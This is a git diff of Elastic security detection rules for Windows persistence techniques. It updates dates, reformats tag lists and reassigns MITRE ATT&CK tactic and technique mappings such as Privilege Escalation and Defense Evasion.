d995fc89f5d..ef56b4fffb8 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,16 +62,7 @@ references = [ risk_score = 21 rule_id = "16a52c14-7883-47af-8745-9357803f0d4c" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -151,48 +142,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index fcea266ea46..e09bae6d5d5 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -123,17 +123,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -147,36 +137,18 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index ed301eb30bb..fbf4a9d2f66 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,36 +122,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/persistence_suspicious_service_created_registry.toml b/rules/windows/persistence_suspicious_service_created_registry.toml index ec8cdfbd5d8..74baf725777 100644 --- a/rules/windows/persistence_suspicious_service_created_registry.toml +++ b/rules/windows/persistence_suspicious_service_created_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,20 +61,7 @@ Windows services are crucial for running background processes. Adversaries explo risk_score = 73 rule_id = "36a8e048-d888-4f61-a8b9-0f9e2e40f317" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -89,31 +76,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml index e3c5bf98f82..f5149a2636f 100644 --- a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml +++ b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,27 +86,13 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] - -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_sysmon_wmi_event_subscription.toml b/rules/windows/persistence_sysmon_wmi_event_subscription.toml index 53d948bc8c5..ce0534283f4 100644 --- a/rules/windows/persistence_sysmon_wmi_event_subscription.toml +++ b/rules/windows/persistence_sysmon_wmi_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/02" integration = ["windows", "endpoint"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,15 +56,7 @@ references = [ risk_score = 47 rule_id = "e72f87d0-a70e-4f8d-8443-a6407bc34643" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Sysmon", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Sysmon", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -82,19 +74,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.003" +name = "Windows Management Instrumentation Event Subscription" +reference = "https://attack.mitre.org/techniques/T1546/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 2a0d907bce6..22823784c3b 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -90,21 +90,7 @@ This rule looks for system shells being spawned by `services.exe`, which is comp risk_score = 47 rule_id = "0022d47d-39c7-4f69-a232-4fe9dc7a3acd" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -120,27 +106,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -151,10 +122,35 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index fbc8a28fda9..696d3b70b43 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ references = ["https://docs.microsoft.com/en-us/windows/security/threat-protecti risk_score = 47 rule_id = "81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -74,36 +66,18 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 7b99257a7d9..192d83104bd 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -105,20 +105,7 @@ references = ["https://pentestlab.blog/2019/10/22/persistence-time-providers/"] risk_score = 47 rule_id = "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -137,36 +124,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.003" -name = "Time Providers" -reference = "https://attack.mitre.org/techniques/T1547/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index 708d2187cb4..f37d13c84d1 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/24" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Skoetting"] @@ -51,16 +51,7 @@ references = [ risk_score = 47 rule_id = "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -102,14 +93,36 @@ iam where host.os.type == "windows" and event.action == "added-member-to-group" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 2bab46a9d12..2b400ddc389 100644 --- a/rules/windows/persistence_user_account_creation.toml +++ b/rules/windows/persistence_user_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 1fb717e1aa7..68f099a5741 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ Application shimming is a Windows feature designed to ensure software compatibil risk_score = 21 rule_id = "fd4a992d-6130-4802-9ff8-829b89ae801f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,36 +88,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml index d5ed04b003e..d2a901ab4b0 100644 --- a/rules/windows/persistence_via_bits_job_notify_command.toml +++ b/rules/windows/persistence_via_bits_job_notify_command.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,18 +68,7 @@ references = [ risk_score = 47 rule_id = "c3b915e0-22f3-4bf7-991d-b643513c722f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -96,14 +85,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1197" +name = "BITS Jobs" +reference = "https://attack.mitre.org/techniques/T1197/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 1d217e04fb3..7a10e60c00b 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,21 +65,7 @@ references = [ risk_score = 73 rule_id = "a9b05c3b-b304-4bf9-970d-acdfaef2944c" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint"] timestamp_override = "event.ingested" type = "eql" @@ -97,43 +83,31 @@ registry where host.os.type == "windows" and event.type == "change" and length(r [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml index 909fe26fa75..6abda8ce324 100644 --- a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml +++ b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,20 +61,7 @@ Security Support Providers (SSPs) in Windows environments facilitate authenticat risk_score = 47 rule_id = "e86da94d-e54b-4fb5-b96c-cecff87e8787" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: 